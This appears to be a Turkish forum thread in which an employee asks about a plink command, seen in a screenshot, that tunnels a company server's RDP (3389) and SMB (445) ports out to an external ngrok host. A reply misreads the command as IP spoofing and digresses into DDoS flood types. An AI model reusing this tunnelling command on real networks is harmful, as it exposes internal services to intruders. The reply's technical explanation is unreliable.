Arkadaşlar, bu görüntü firmamızdan alınmıştır. Bu eleman ne yapmaya çalışıyor, bu kodların anlamı nedir?
Dostum selamlar, sunucunuzu tünelleyerek internete çıkartmayı denemiş başarılı da olmuş.
16402 nolu portu bir kontrol edin derim sistem üzerinde. Tünelleyip internette yayına aldığı klasörü aşağı da gösteriyor /usr/share/doc/*
Dikkat edersen
AntiSpoof yapıyor,
ipspoofing genellikle internet dünyasında ip spoofing denildiğinde başkasının ip adresinden mail göndermek, bir foruma mesaj yazmak işlemleri gelir bu pek mümkün gibi görünmese de günümüz sistemleri üzerinde çok basitleşiyor. IP spoofing günümüz siber dünyasında yoğunlukla DDoS saldırılarında kullanılmaktadır. DDoS saldırılarının da
statefull olmayan protokollerle gerçekleştirilen bölümünde geçerlidir. Yani
HTTP GET flood sahte ip adreslerinden gerçekleştirilemez. Ama
SYN flood, ACK flood, UDP Flood, DNS flood gibi saldırılar sahte ip adreslerindne gerçekleştirilebilir. Bunun haricinde ip spoofing saldırıları
UDP tabanlı protokollerdeki ip adresi sınırlamasını aşmak için de kullanılmaktadır. Bu yaptığı işlem ile aradaki adam saldırısı gerçekleştirebilir oluşturduğu tünel ile, çünkü TCP ve UDP tünelleri verinin karşı tarafa ulaşıp ulaşmadığını kontrol eder. Bu verileri aradan çekip kendine ya da diğer ekranlara farklı şekil de yansıtabilir istediği şekil de.
Konuyu biraz daha açabilir misiniz, hocam? Tünelleyerek ne demek? Orada şu şekilde bir komut çalıştırmış ssh ile:
plink 3389:10.1.505.12:445
[email protected] -P 16402 000000 -no-antispoof
Bunu ben tam olarak anlamadım plink bir putty programı, '
[email protected]' << buda ngrok'un verdigi bir dış ip adresi, sonra portlar yazılmış. Bu 3389 uzak masaüstü portu, buda 445 smb portu. Bu adam tam olarak bu satır ile ne yapmaya çalışmış anlamıyorum hala.
cmd ekranında sonra kali linux'un çalıştığını görüyorum. Halbuki bizim yerel sunucumuz windows server 2003, orada ekranda ise kali linux görünüyor. Bunu detaylı anlatabilecek biri var mı forumda lütfen? Çok önemli bu